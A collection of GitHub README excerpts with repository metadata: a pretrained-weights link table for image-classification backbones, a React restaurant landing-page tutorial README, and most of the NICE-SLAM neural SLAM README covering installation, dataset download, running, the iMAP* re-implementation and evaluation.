distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-base-distilled_3rdparty_pt-16xb64_in1k_20211216-42891296.pth)<br/>[DeiT-base 384px](https://download.openmmlab.com/mmclassification/v0/deit/deit-base_3rdparty_ft-16xb32_in1k-384px_20211124-822d02f2.pth)<br/>[DeiT-base distilled 384px](https://download.openmmlab.com/mmclassification/v0/deit/deit-base-distilled_3rdparty_ft-16xb32_in1k-384px_20211216-e48d6000.pth)|**Conformer**|[Conformer-tiny-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-tiny-p16_3rdparty_8xb128_in1k_20211206-f6860372.pth)<br/>[Conformer-small-p32](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-small-p32_8xb128_in1k_20211206-947a0816.pth)<br/>[Conformer-small-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-small-p16_3rdparty_8xb128_in1k_20211206-3065dcf5.pth)<br/>[Conformer-base-p16](https://download.openmmlab.com/mmclassification/v0/conformer/conformer-base-p16_3rdparty_8xb128_in1k_20211206-bfdf8637.pth)|
|**T2T-ViT**|[T2T-ViT_t-14](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-14_8xb64_in1k_20211220-f7378dd5.pth)<br/>[T2T-ViT_t-19](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-19_8xb64_in1k_20211214-7f5e3aaf.pth)<br/>[T2T-ViT_t-24](https://download.openmmlab.com/mmclassification/v0/t2t-vit/t2t-vit-t-24_8xb64_in1k_20211214-b2a68ae3.pth)|**Twins**|[PCPVT-small](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-small_3rdparty_8xb128_in1k_20220126-ef23c132.pth)<br/>[PCPVT-base](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-base_3rdparty_8xb128_in1k_20220126-f8c4b0d5.pth)<br/>[PCPVT-large](https://download.openmmlab.com/mmclassification/v0/twins/twins-pcpvt-large_3rdparty_16xb64_in1k_20220126-c1ef8d80.pth)<br/>[SVT-small](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-small_3rdparty_8xb128_in1k_20220126-8fe5205b.pth)<br/>[SVT-base](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-base_3rdparty_8xb128_in1k_20220126-e31cc8e9.pth)<br/>[SVT-large](https://download.openmmlab.com/mmclassification/v0/twins/twins-svt-large_3rdparty_16xb64_in1k_20220126-4817645f.pth)|**PoolFormer**|[PoolFormer-S12](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s12_3rdparty_32xb128_in1k_20220414-f8d83051.pth)<br/>[PoolFormer-S24](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s24_3rdparty_32xb128_in1k_20220414-d7055904.pth)<br/>[PoolFormer-S36](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-s36_3rdparty_32xb128_in1k_20220414-d78ff3e8.pth)<br/>[PoolFormer-M36](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-m36_3rdparty_32xb128_in1k_20220414-c55e0949.pth)<br/>[PoolFormer-M48](https://download.openmmlab.com/mmclassification/v0/poolformer/poolformer-m48_3rdparty_32xb128_in1k_20220414-9378f3eb.pth)|
|**DenseNet**|[DenseNet121](https://download.openmmlab.com/mmclassification/v0/densenet/densenet121_4xb256_in1k_20220426-07450f99.pth)<br/>[DenseNet161](https://download.openmmlab.com/mmclassification/v0/densenet/densenet161_4xb256_in1k_20220426-ee6a80a9.pth)<br/>[DenseNet169](https://download.openmmlab.com/mmclassification/v0/densenet/densenet169_4xb256_in1k_20220426-a2889902.pth)<br/>[DenseNet201](https://download.openmmlab.com/mmclassification/v0/densenet/densenet201_4xb256_in1k_20220426-05cae4ef.pth)|**Visual Attention Network(VAN)**|[VAN-Tiny](https://download.openmmlab.com/mmclassification/v0/van/van-tiny_8xb128_in1k_20220501-385941af.pth)<br/>[VAN-Small](https://download.openmmlab.com/mmclassification/v0/van/van-small_8xb128_in1k_20220501-17bc91aa.pth)<br/>[VAN-Base](https://download.openmmlab.com/mmclassification/v0/van/van-base_8xb128_in1k_20220501-6a4cc31b.pth)<br/>[VAN-Large](https://download.openmmlab.com/mmclassification/v0/van/van-large_8xb128_in1k_20220501-f212ba21.pth)|**Wide-ResNet**|[WRN-50](https://download.openmmlab.com/mmclassification/v0/wrn/wide-resnet50_3rdparty-timm_8xb32_in1k_20220304-83ae4399.pth)<br/>[WRN-101](https://download.openmmlab.com/mmclassification/v0/wrn/wide-resnet101_3rdparty_8xb32_in1k_20220304-8d5f9d61.pth)|
|**HorNet**|[HorNet-Tiny](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-tiny_3rdparty_in1k_20220915-0e8eedff.pth)<br/>[HorNet-Tiny-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-tiny-gf_3rdparty_in1k_20220915-4c35a66b.pth)<br/>[HorNet-Small](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-small_3rdparty_in1k_20220915-5935f60f.pth)<br/>[HorNet-Small-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-small-gf_3rdparty_in1k_20220915-649ca492.pth)<br/>[HorNet-Base](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base_3rdparty_in1k_20220915-a06176bb.pth)<br/>[HorNet-Base-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base-gf_3rdparty_in1k_20220915-82c06fa7.pth)<br/>[HorNet-Large](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-large_3rdparty_in21k_20220909-9ccef421.pth)<br/>[HorNet-Large-GF](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-large-gf_3rdparty_in21k_20220909-3aea3b61.pth)<br/>[HorNet-Large-GF384](https://download.openmmlab.com/mmclassification/v0/hornet/hornet-base-gf_3rdparty_in1k_20220915-82c06fa7.pth)|**EfficientFormer**|[efficientformer-l1](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l1_3rdparty_in1k_20220803-d66e61df.pth)<br/>[efficientformer-l3](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l3_3rdparty_in1k_20220803-dde1c8c5.pth)<br/>[efficientformer-l7](https://download.openmmlab.com/mmclassification/v0/efficientformer/efficientformer-l7_3rdparty_in1k_20220803-41a552bb.pth)|**Swin Transformer v2**|[tiny-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-tiny-w8_3rdparty_in1k-256px_20220803-e318968f.pth)<br/>[tiny-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-tiny-w16_3rdparty_in1k-256px_20220803-9651cdd7.pth)<br/>[small-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-small-w8_3rdparty_in1k-256px_20220803-b01a4332.pth)<br/>[small-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-small-w16_3rdparty_in1k-256px_20220803-b707d206.pth)<br/>[base-256 window 8](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-base-w8_3rdparty_in1k-256px_20220803-8ff28f2b.pth)<br/>[base-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-base-w16_3rdparty_in1k-256px_20220803-5a1886b7.pth)<br/>[large-256 window 16](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-large-w16_in21k-pre_3rdparty_in1k-256px_20220803-c40cbed7.pth)<br/>[large-384 window 24](https://download.openmmlab.com/mmclassification/v0/swin-v2/swinv2-large-w24_in21k-pre_3rdparty_in1k-384px_20220803-3b36c165.pth)|
|**MViTv2**|[MViTv2-Tiny](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-tiny_3rdparty_in1k_20220722-db7beeef.pth)<br/>[MViTv2-Small](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-small_3rdparty_in1k_20220722-986bd741.pth)<br/>[MViTv2-Base](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-base_3rdparty_in1k_20220722-9c4f0a17.pth)<br/>[MViTv2-Large](https://download.openmmlab.com/mmclassification/v0/mvit/mvitv2-large_3rdparty_in1k_20220722-2b57b983.pth)|**MobileVit**|[MobileViT-XXSmall](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-xxsmall_3rdparty_in1k_20221018-77835605.pth)<br>[MobileViT-XSmall](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-xsmall_3rdparty_in1k_20221018-be39a6e7.pth)<br>[MobileViT-Small](https://download.openmmlab.com/mmclassification/v0/mobilevit/mobilevit-small_3rdparty_in1k_20221018-cb4f741c.pth)|**DaViT**|[DaViT-T](https://download.openmmlab.com/mmclassification/v0/davit/davit-tiny_3rdparty_in1k_20221116-700fdf7d.pth)<br>[DaViT-S](https://download.openmmlab.com/mmclassification/v0/davit/davit-small_3rdparty_in1k_20221116-51a849a6.pth)<br>[DaViT-B](https://download.openmmlab.com/mmclassification/v0/davit/davit-base_3rdparty_in1k_20221116-19e0d956.pth)|
|**RepLKNet**|[RepLKNet-31B-224](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31B_in21k-pre_3rdparty_in1k_20221118-54ed5c46.pth)<br>[RepLKNet-31B-384](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31B_in21k-pre_3rdparty_in1k-384px_20221118-76c92b24.pth)<br>[RepLKNet-31L-384](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-31L_in21k-pre_3rdparty_in1k-384px_20221118-dc3fc07c.pth)<br>[RepLKNet-XL](https://download.openmmlab.com/mmclassification/v0/replknet/replknet-XL_meg73m-pre_3rdparty_in1k-320px_20221118-88259b1d.pth)|**BEiT**|[BEiT-base](https://download.openmmlab.com/mmclassification/v0/beit/beit-base_3rdparty_in1k_20221114-c0a4df23.pth)|**EVA**|[EVA-G-p14-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-pre_3rdparty_in21k_20221213-d72285b7.pth)<br>[EVA-G-p14-336](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-in21k-pre_3rdparty_in1k-336px_20221213-210f9071.pth)<br>[EVA-G-p14-560](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p14_30m-in21k-pre_3rdparty_in1k-560px_20221213-fa1c3652.pth)<br>[EVA-G-p16-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-g-p16_3rdparty_30m_20221213-7bed23ee.pth)<br>[EVA-L-p14-224](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-pre_3rdparty_in21k_20221213-8f194fa2.pth)<br>[EVA-L-p14-196](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-in21k-pre_3rdparty_in1k-196px_20221213-b730c7e7.pth)<br>[EVA-L-p14-336](https://download.openmmlab.com/mmclassification/v0/eva/eva-l-p14_mim-in21k-pre_3rdparty_in1k-336px_20221213-f25b7634.pth)
|**MixMIM**|[mixmim-base](https://download.openmmlab.com/mmclassification/v0/mixmim/mixmim-base_3rdparty_in1k_20221206-e40e2c8c.pth)|**EfficientNetV2**|[EfficientNetV2-b0](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b0_3rdparty_in1k_20221221-9ef6e736.pth)<br>[EfficientNetV2-b1](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b1_3rdparty_in1k_20221221-6955d9ce.pth)<br>[EfficientNetV2-b2](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b2_3rdparty_in1k_20221221-74f7d493.pth)<br>[EfficientNetV2-b3](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-b3_3rdparty_in1k_20221221-b6f07a36.pth)<br>[EfficientNetV2-s](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-s_in21k-pre-3rdparty_in1k_20221220-7a7c8475.pth)<br>[EfficientNetV2-m](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-m_in21k-pre-3rdparty_in1k_20221220-a1013a04.pth)<br>[EfficientNetV2-l](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-l_in21k-pre-3rdparty_in1k_20221220-63df0efd.pth)<br>[EfficientNetV2-xl](https://download.openmmlab.com/mmclassification/v0/efficientnetv2/efficientnetv2-xl_in21k-pre-3rdparty_in1k_20221220-583ac18b.pth)|**DeiT3**|[deit3_small_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-small-p16_3rdparty_in1k_20221008-0f7c70cf.pth)<br/>[deit3_small_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-small-p16_3rdparty_in1k-384px_20221008-a2c1a0c7.pth)<br/>[deit3_base_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-base-p16_3rdparty_in1k_20221008-60b8c8bf.pth)<br/>[deit3_base_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-base-p16_3rdparty_in1k-384px_20221009-e19e36d4.pth)<br/>[deit3_medium_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-medium-p16_3rdparty_in1k_20221008-3b21284d.pth)<br/>[deit3_large_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-large-p16_3rdparty_in1k_20221009-03b427ea.pth)<br/>[deit3_large_p16_384](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-large-p16_3rdparty_in1k-384px_20221009-4317ce62.pth)<br/>[deit3_huge_p16](https://download.openmmlab.com/mmclassification/v0/deit3/deit3-huge-p14_3rdparty_in1k_20221009-e107bcb7.pth)|
|**EdgeNeXt**|[edgenext-base](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-base_3rdparty_in1k_20220801-9ade408b.pth)<br>[edgenext-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-small_3rdparty_in1k_20220801-d00db5f8.pth)<br>[edgenext-X-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-xsmall_3rdparty_in1k_20220801-974f9fe7.pth)<br>[edgenext-XX-small](https://download.openmmlab.com/mmclassification/v0/edgenext/edgenext-xxsmall_3rdparty_in1k_20220801-7ca8a81d.pth)|**RevVisionTransformer**|[revvit-small](https://download.openmmlab.com/mmclassification/v0/revvit/revvit-base_3rdparty_in1k_20221213-87a7b0a5.pth)<br>[revvit-base](https://download.openmmlab.com/mmclassification/v0/revvit/revvit-small_3rdparty_in1k_20221213-a3a34f5c.pth)
## Other Projects I Maintain
- [**Not enough image data? I built an image augmentation tool**](https://github.com/Fafa-DL/Image-Augmentation)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Image-Augmentation)](https://github.com/Fafa-DL/Image-Augmentation)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Image-Augmentation)](https://github.com/Fafa-DL/Image-Augmentation)
- [**A tool for one-click conversion and editing of image annotation files, greatly improving efficiency**](https://github.com/Fafa-DL/LabelConvert)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/LabelConvert)](https://github.com/Fafa-DL/LabelConvert)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/LabelConvert)](https://github.com/Fafa-DL/LabelConvert)
## Reference
```
@misc{2020mmclassification,
title={OpenMMLab's Image Classification Toolbox and Benchmark},
author={MMClassification Contributors},
howpublished = {\url{https://github.com/open-mmlab/mmclassification}},
year={2020}
}
```
| Integrate deep learning models for image classification | Backbone learning/comparison/magic modification project | pytorch,image-classification,transformer,cnn,pytorch-classification,deep-learning,resnet,swin-transformer | 0 | 2 | 1 | 117 | 23 | 1 | 0 |
adrianhajdin/project_modern_ui_ux_restaurant | # Restaurant Landing Page
### [Live Site](https://gericht-restaurant.com/)
![Restaurant Landing Page](https://i.ibb.co/5jxBKpw/image.png)
### [🌟 Become a top 1% Next.js 13 developer in only one course](https://jsmastery.pro/next13)
### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)
## Stay up to date with new projects
New major projects coming soon, subscribe to the mailing list to stay up to date https://resource.jsmasterypro.com/newsletter
## Introduction
This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website
You might be wondering, what are the prerequisites for building such an amazing website? Don't worry, this course is completely beginner-friendly! We're going to start easy and then move to more complex topics. Every step of the way will be explained. Alongside building the website, you'll learn:
- React Functional components and their reusability
- React file and folder structure
- Fundamental CSS properties to master flex & grid
- Fundamentals of the CSS BEM Model
- From soft and pleasant animations to complex gradients
- Perfectly placed media queries for satisfactory responsiveness covering almost all devices
- And at the end you'll learn how to deploy your websites to extremely fast servers and give them a custom domain name.
| This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website | react,reactjs,modern,ui,ux | 0 | 2 | 8 | 13 | 7 | 1 | 0 |
cvg/nice-slam | <!-- PROJECT LOGO -->
<p align="center">
<h1 align="center"><img src="media/logo.png" width="60">NICE-SLAM: Neural Implicit Scalable Encoding for SLAM</h1>
<p align="center">
<a href="https://zzh2000.github.io"><strong>Zihan Zhu*</strong></a>
·
<a href="https://pengsongyou.github.io"><strong>Songyou Peng*</strong></a>
·
<a href="http://people.inf.ethz.ch/vlarsson/"><strong>Viktor Larsson</strong></a>
·
<a href="http://www.cad.zju.edu.cn/home/weiweixu/weiweixu_en.htm"><strong>Weiwei Xu</strong></a>
·
<a href="http://www.cad.zju.edu.cn/home/bao/"><strong>Hujun Bao</strong></a>
<br>
<a href="https://zhpcui.github.io/"><strong>Zhaopeng Cui</strong></a>
·
<a href="http://people.inf.ethz.ch/moswald/"><strong>Martin R. Oswald</strong></a>
·
<a href="https://people.inf.ethz.ch/pomarc/"><strong>Marc Pollefeys</strong></a>
</p>
<p align="center"><strong>(* Equal Contribution)</strong></p>
<h2 align="center">CVPR 2022</h2>
<h3 align="center"><a href="https://arxiv.org/abs/2112.12130">Paper</a> | <a href="https://youtu.be/V5hYTz5os0M">Video</a> | <a href="https://pengsongyou.github.io/nice-slam">Project Page</a></h3>
<div align="center"></div>
</p>
<p align="center">
<a href="">
<img src="./media/apartment.gif" alt="Logo" width="80%">
</a>
</p>
<p align="center">
NICE-SLAM produces accurate dense geometry and camera tracking on large-scale indoor scenes.
</p>
<p align="center">
(The black / red lines are the ground truth / predicted camera trajectory)
</p>
<br>
<br>
<!-- TABLE OF CONTENTS -->
<details open="open" style='padding: 10px; border-radius:5px 30px 30px 5px; border-style: solid; border-width: 1px;'>
<summary>Table of Contents</summary>
<ol>
<li>
<a href="#installation">Installation</a>
</li>
<li>
<a href="#visualizing-nice-slam-results">Visualization</a>
</li>
<li>
<a href="#demo">Demo</a>
</li>
<li>
<a href="#run">Run</a>
</li>
<li>
<a href="#imap">iMAP*</a>
</li>
<li>
<a href="#evaluation">Evaluation</a>
</li>
<li>
<a href="#acknowledgement">Acknowledgement</a>
</li>
<li>
<a href="#citation">Citation</a>
</li>
<li>
<a href="#contact">Contact</a>
</li>
</ol>
</details>
## Installation
First you have to make sure that you have all dependencies in place.
The simplest way to do so is to use [anaconda](https://www.anaconda.com/).
You can create an anaconda environment called `nice-slam`. For Linux, you need to install **libopenexr-dev** before creating the environment.
```bash
sudo apt-get install libopenexr-dev
conda env create -f environment.yaml
conda activate nice-slam
```
## Visualizing NICE-SLAM Results
We provide the results of NICE-SLAM ready for download. You can run our **interactive visualizer** as follows.
### Self-captured Apartment
To visualize our results on the self-captured apartment, as shown in the teaser:
```bash
bash scripts/download_vis_apartment.sh
python visualizer.py configs/Apartment/apartment.yaml --output output/vis/Apartment
```
**Note for users from China:** If you encounter slow download speeds, check the `scripts/download_*.sh` scripts, where we also provide 和彩云 (China Mobile Cloud) links for you to download manually.
### ScanNet
```bash
bash scripts/download_vis_scene0000.sh
python visualizer.py configs/ScanNet/scene0000.yaml --output output/vis/scannet/scans/scene0000_00
```
<p align="center">
<img src="./media/scannet.gif" width="60%" />
</p>
You can find the results of NICE-SLAM on other scenes in ScanNet [here](https://cvg-data.inf.ethz.ch/nice-slam/vis/scannet/).
### Replica
```bash
bash scripts/download_vis_room1.sh
python visualizer.py configs/Replica/room1.yaml --output output/vis/Replica/room1
```
<p align="center">
<img src="./media/replica.gif" width="70%" />
</p>
You can find the results of NICE-SLAM on other scenes in Replica [here](https://cvg-data.inf.ethz.ch/nice-slam/vis/Replica/).
### Interactive Visualizer Usage
The black trajectory indicates the ground truth trajectory, and the red one is the trajectory estimated by NICE-SLAM.
- Press `Ctrl+0` for grey mesh rendering.
- Press `Ctrl+1` for textured mesh rendering.
- Press `Ctrl+9` for normal rendering.
- Press `L` to turn off/on lighting.
### Command line arguments
- `--output $OUTPUT_FOLDER` output folder (overwrite the output folder in the config file)
- `--input_folder $INPUT_FOLDER` input folder (overwrite the input folder in the config file)
- `--save_rendering` save rendering video to `vis.mp4` in the output folder
- `--no_gt_traj` do not show ground truth trajectory
- `--imap` visualize results of iMAP*
- `--vis_input_frame` opens up a viewer to show input frames. Note: you need to download the dataset first. See the Run section below.
## Demo
Here you can run NICE-SLAM yourself on a short ScanNet sequence with 500 frames.
First, download the demo data as below and the data is saved into the `./Datasets/Demo` folder.
```bash
bash scripts/download_demo.sh
```
Next, run NICE-SLAM. It takes a few minutes with ~5G GPU memory.
```bash
python -W ignore run.py configs/Demo/demo.yaml
```
Finally, run the following command to visualize.
```bash
python visualizer.py configs/Demo/demo.yaml
```
**NOTE:** This is for demonstration only, its configuration/performance may be different from our paper.
## Run
### Self-captured Apartment
Download the data as below and the data is saved into the `./Datasets/Apartment` folder.
```bash
bash scripts/download_apartment.sh
```
Next, run NICE-SLAM:
```bash
python -W ignore run.py configs/Apartment/apartment.yaml
```
### ScanNet
Please follow the data downloading procedure on [ScanNet](http://www.scan-net.org/) website, and extract color/depth frames from the `.sens` file using this [code](https://github.com/ScanNet/ScanNet/blob/master/SensReader/python/reader.py).
<details>
<summary>[Directory structure of ScanNet (click to expand)]</summary>
DATAROOT is `./Datasets` by default. If a sequence (`sceneXXXX_XX`) is stored in other places, please change the `input_folder` path in the config file or in the command line.
```
DATAROOT
└── scannet
└── scans
└── scene0000_00
└── frames
├── color
│ ├── 0.jpg
│ ├── 1.jpg
│ ├── ...
│ └── ...
├── depth
│ ├── 0.png
│ ├── 1.png
│ ├── ...
│ └── ...
├── intrinsic
└── pose
├── 0.txt
├── 1.txt
├── ...
└── ...
```
</details>
Once the data is downloaded and set up properly, you can run NICE-SLAM:
```bash
python -W ignore run.py configs/ScanNet/scene0000.yaml
```
### Replica
Download the data as below and the data is saved into the `./Datasets/Replica` folder. Note that the Replica data is generated by the authors of iMAP, so please cite iMAP if you use the data.
```bash
bash scripts/download_replica.sh
```
and you can run NICE-SLAM:
```bash
python -W ignore run.py configs/Replica/room0.yaml
```
The mesh for evaluation is saved as `$OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply`, where the unseen regions are culled using all frames.
### TUM RGB-D
Download the data as below and the data is saved into the `./Datasets/TUM-RGBD` folder.
```bash
bash scripts/download_tum.sh
```
Now run NICE-SLAM:
```bash
python -W ignore run.py configs/TUM_RGBD/freiburg1_desk.yaml
```
### Co-Fusion
First, download the dataset. This script should download and unpack the data automatically into the `./Datasets/CoFusion` folder.
```bash
bash scripts/download_cofusion.sh
```
Run NICE-SLAM:
```bash
python -W ignore run.py configs/CoFusion/room4.yaml
```
### Use your own RGB-D sequence from Kinect Azure
<details>
<summary>[Details (click to expand)]</summary>
1. Please first follow this [guide](http://www.open3d.org/docs/release/tutorial/sensor/azure_kinect.html#install-the-azure-kinect-sdk) to record a sequence and extract aligned color and depth images. (Remember to use `--align_depth_to_color` for `azure_kinect_recorder.py`)
DATAROOT is `./Datasets` by default. If a sequence (`sceneXX`) is stored in other places, please change the `input_folder` path in the config file or in the command line.
```
DATAROOT
└── Own
└── scene0
├── color
│ ├── 00000.jpg
│ ├── 00001.jpg
│ ├── 00002.jpg
│ ├── ...
│ └── ...
├── config.json
├── depth
│ ├── 00000.png
│ ├── 00001.png
│ ├── 00002.png
│ ├── ...
│ └── ...
└── intrinsic.json
```
2. Prepare a `.yaml` file based on `configs/Own/sample.yaml`. Change the camera intrinsics in the config file based on `intrinsic.json` (a minimal helper for reading it is sketched after this list). You can also get the intrinsics of the depth camera via other tools, such as MATLAB.
3. Specify the bound of the scene. If no ground truth camera pose is given, we construct world coordinates on the first frame. The X-axis is from left to right, Y-axis is from down to up, Z-axis is from front to back.
4. Change the `input_folder` path and/or the `output` path in the config file or the command line.
5. Run NICE-SLAM.
```bash
python -W ignore run.py configs/Own/sample.yaml
```
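For step 2, here is a minimal helper sketch (not part of the NICE-SLAM codebase) for reading the camera intrinsics out of `intrinsic.json`, assuming Open3D's pinhole-camera JSON layout with a column-major `intrinsic_matrix`; the printed values can then be copied into the camera intrinsics of your `.yaml` config.

```python
import json

def read_intrinsics(path="Datasets/Own/scene0/intrinsic.json"):
    # Open3D stores the 3x3 pinhole matrix column-major:
    # [fx, 0, 0, 0, fy, 0, cx, cy, 1]
    with open(path) as f:
        data = json.load(f)
    m = data["intrinsic_matrix"]
    return {
        "H": data["height"],
        "W": data["width"],
        "fx": m[0],
        "fy": m[4],
        "cx": m[6],
        "cy": m[7],
    }

if __name__ == "__main__":
    print(read_intrinsics())
```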
**(Optional but highly recommended)** If you don't want to specify the bound of the scene or manually change the config file, you can first run the Redwood tool in [Open3D](http://www.open3d.org/) and then run NICE-SLAM. Here we provide steps for the whole pipeline, beginning from recording Azure Kinect videos. (Ubuntu 18.04 and above is recommended.)
1. Download the Open3D repository.
```bash
bash scripts/download_open3d.sh
```
2. Record and extract frames.
```bash
# specify scene ID
sceneid=0
cd 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/
# record and save to .mkv file
python sensors/azure_kinect_recorder.py --align_depth_to_color --output scene$sceneid.mkv
# extract frames
python sensors/azure_kinect_mkv_reader.py --input scene$sceneid.mkv --output dataset/scene$sceneid
```
3. Run reconstruction.
```bash
python run_system.py dataset/scene$sceneid/config.json --make --register --refine --integrate
# back to main folder
cd ../../../../../
```
4. Prepare the config file.
```bash
python src/tools/prep_own_data.py --scene_folder 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/dataset/scene$sceneid --ouput_config configs/Own/scene$sceneid.yaml
```
5. Run NICE-SLAM.
```bash
python -W ignore run.py configs/Own/scene$sceneid.yaml
```
</details>
## iMAP*
We also provide our re-implementation of iMAP (iMAP*) for use. If you use the code, please cite both the original iMAP paper and NICE-SLAM.
### Usage
iMAP* shares a majority part of the code with NICE-SLAM. To run iMAP*, simply use `*_imap.yaml` in the config file and also add the argument `--imap` in the command line. For example, to run iMAP* on Replica room0:
```bash
python -W ignore run.py configs/Replica/room0_imap.yaml --imap
```
To use our interactive visualizer:
```bash
python visualizer.py configs/Replica/room0_imap.yaml --imap
```
To evaluate ATE:
```bash
python src/tools/eval_ate.py configs/Replica/room0_imap.yaml --imap
```
<details>
<summary>[<strong>Differences between iMAP* and the original iMAP</strong> (click to expand)]</summary>
#### Keyframe pose optimization during mapping
We do not optimize the selected keyframes' poses for iMAP*, because optimizing them usually leads to worse performance. One possible reason is that their keyframes are selected globally, so many of them do not have overlapping regions, especially when the scene gets larger. Overlap is a prerequisite for bundle adjustment (BA). For NICE-SLAM, we only select overlapping keyframes within a small window (local BA), which works well in all scenes. You can still turn on the keyframe pose optimization during mapping for iMAP* by enabling `BA` in the config file.
#### Active sampling
We disable the active sampling in iMAP*, because in our experiments we observe that it does not help to improve the performance while bringing additional computational overhead.
For the image active sampling, in each iteration the original iMAP uniformly samples 200 pixels in the entire image. Next, they divide this image into an 8x8 grid and calculate the probability distribution from the rendering losses. This means that if the resolution of an image is 1200x680 (Replica), only around 3 pixels are sampled to calculate the distribution for a 150x85 grid patch. This is not much different from simple uniform sampling. Therefore, during mapping we use the same pixel sampling strategy as NICE-SLAM for iMAP*: uniform sampling, but with 4x more pixels than reported in the iMAP paper.
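For concreteness, below is a rough self-contained sketch of that image active sampling scheme (our illustration of the idea, not code from iMAP or NICE-SLAM): the losses of the uniformly sampled pixels are pooled into the 8x8 grid, normalized into a probability distribution, and new pixels are then drawn from the cells proportionally to it.

```python
import numpy as np

def image_active_sampling(uv, loss, hw, grid=8, n_new=200, rng=np.random):
    """uv: (N, 2) pixel coords (u, v) of uniformly sampled pixels; loss: (N,) rendering losses."""
    H, W = hw
    gh, gw = H / grid, W / grid
    # Pool each sampled pixel's loss into its grid cell.
    row = np.clip((uv[:, 1] // gh).astype(int), 0, grid - 1)
    col = np.clip((uv[:, 0] // gw).astype(int), 0, grid - 1)
    cell_loss = np.bincount(row * grid + col, weights=loss, minlength=grid * grid)
    prob = cell_loss / max(cell_loss.sum(), 1e-12)
    # Distribute the new samples across cells proportionally to the pooled loss.
    counts = rng.multinomial(n_new, prob)
    samples = []
    for c, n in enumerate(counts):
        if n == 0:
            continue
        r, k = divmod(c, grid)
        u = rng.uniform(k * gw, (k + 1) * gw, size=n)
        v = rng.uniform(r * gh, (r + 1) * gh, size=n)
        samples.append(np.stack([u, v], axis=1))
    return np.concatenate(samples) if samples else np.empty((0, 2))
```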
For the keyframe active sampling, the original iMAP requires rendering depth and color images for all keyframes to get the loss distribution, which is expensive and we again did not find it very helpful. Instead, as done in NICE-SLAM, iMAP* randomly samples keyframes from the keyframe list. We also let iMAP* optimize for 4x more iterations than NICE-SLAM, but its performance is still inferior.
#### Keyframe selection
For fair comparison, we use the same keyframe selection method in iMAP* as in NICE-SLAM: add one keyframe to the keyframe list every 50 frames.
</details>
## Evaluation
### Average Trajectory Error
To evaluate the average trajectory error, run the command below with the corresponding config file:
```bash
python src/tools/eval_ate.py configs/Replica/room0.yaml
```
### Reconstruction Error
